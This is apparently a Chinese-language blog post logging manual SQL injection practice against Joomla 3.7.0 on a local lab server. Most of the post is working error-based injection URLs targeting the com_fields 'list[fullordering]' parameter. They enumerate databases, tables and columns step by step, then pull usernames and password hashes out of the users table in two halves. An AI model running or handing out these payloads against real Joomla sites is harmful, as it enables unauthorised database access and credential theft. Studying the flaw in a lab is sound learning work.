Joomla3.7.0注入测试记录

手注学习中

忙的差不多了
不知道年底有没有奖金啥的QAQ
针对Joomla3.7.0中的注入学习

Joomla3.7.0注入

1.png
根据payload显而易见报错

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

2.png

猜库

3.png

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x20),1))

burp跑一圈
4.png
比较像的数据库joomla370

猜表

5.png

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x6a6f6f6d6c61333730) LIMIT 0,1),0x20),1))

burp跑一圈
6.png
比较有用的表o1ldu_users

猜列

7.png

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,22) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6f316c64755f7573657273 AND table_schema=0x6a6f6f6d6c61333730 LIMIT 0,1),0x20),1))

burp跑一圈
8.png
比较有用的表username,password

出数据

用户名
9.png

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

密码

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

1
http://192.168.3.22/Joomla_3.7.0-Stable-Full_Package/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(UPDATEXML(1,CONCAT(0x2e,0x20,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),33,32) FROM joomla370.o1ldu_users ORDER BY password),0x20),1))

两段拼起来才是密文
10.png

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. 手注学习中
  2. 2. Joomla3.7.0注入
    1. 2.1. 猜库
    2. 2.2. 猜表
    3. 2.3. 猜列
    4. 2.4. 出数据
  3. 3. 到此结束